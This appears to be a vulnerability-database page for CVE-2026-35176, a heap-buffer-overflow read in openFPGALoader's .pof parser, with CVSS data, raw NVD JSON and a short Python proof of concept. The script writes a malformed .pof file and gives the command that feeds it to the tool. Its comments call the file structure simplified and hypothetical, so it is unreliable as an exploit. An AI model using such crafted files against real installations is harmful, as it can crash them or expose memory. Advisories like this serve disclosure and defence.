Security Vulnerability Report
中文
CVE-2026-35176 CVSS 7.1 HIGH

CVE-2026-35176

Published: 2026-04-06 20:16:26
Last Modified: 2026-04-28 17:04:24
Source: [email protected]

Description

openFPGALoader is a utility for programming FPGAs. In 1.1.1 and earlier, a heap-buffer-overflow read vulnerability exists in POFParser::parseSection() that allows out-of-bounds heap memory access when parsing a crafted .pof file. No FPGA hardware is required to trigger this vulnerability.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:trabucayre:openfpgaloader:*:*:*:*:*:*:*:* - VULNERABLE
openFPGALoader <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os # PoC for CVE-2026-35176: Heap Buffer Overflow in openFPGALoader # This script generates a malformed .pof file designed to trigger # the buffer overflow in POFParser::parseSection(). def generate_malformed_pof(filename): # A valid .pof file has a specific structure. We create a file # with a crafted header that may pass initial checks but # contains a section size that triggers the overflow. # Dummy header bytes (simplified for demonstration) header = b'POF\x00' + b'\x00' * 12 # Malformed Section Data # We craft a section with a size that exceeds the allocated buffer # when parsed by POFParser::parseSection(). section_id = 0x01 # Hypothetical large size value to cause overflow section_size = 0xFFFFFFFF # Constructing the malicious payload # Format: [Section ID (4 bytes)] [Size (4 bytes)] [Data] payload = section_id.to_bytes(4, 'little') + \ section_size.to_bytes(4, 'little') + \ b'A' * 100 # Minimal payload data with open(filename, 'wb') as f: f.write(header + payload) print(f"[+] Malformed POF file generated: {filename}") print(f"[*] To trigger the vulnerability, run:") print(f" openFPGALoader -f {filename}") if __name__ == "__main__": generate_malformed_pof("cve_2026_35176_poc.pof")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35176", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:25.773", "lastModified": "2026-04-28T17:04:24.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "openFPGALoader is a utility for programming FPGAs. In 1.1.1 and earlier, a heap-buffer-overflow read vulnerability exists in POFParser::parseSection() that allows out-of-bounds heap memory access when parsing a crafted .pof file. No FPGA hardware is required to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trabucayre:openfpgaloader:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1.1", "matchCriteriaId": "62581179-C886-4DE6-B888-53C8E5509FBA"}]}]}], "references": [{"url": "https://github.com/trabucayre/openFPGALoader/security/advisories/GHSA-9x7m-m8gv-px2j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trabucayre/openFPGALoader/security/advisories/GHSA-9x7m-m8gv-px2j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.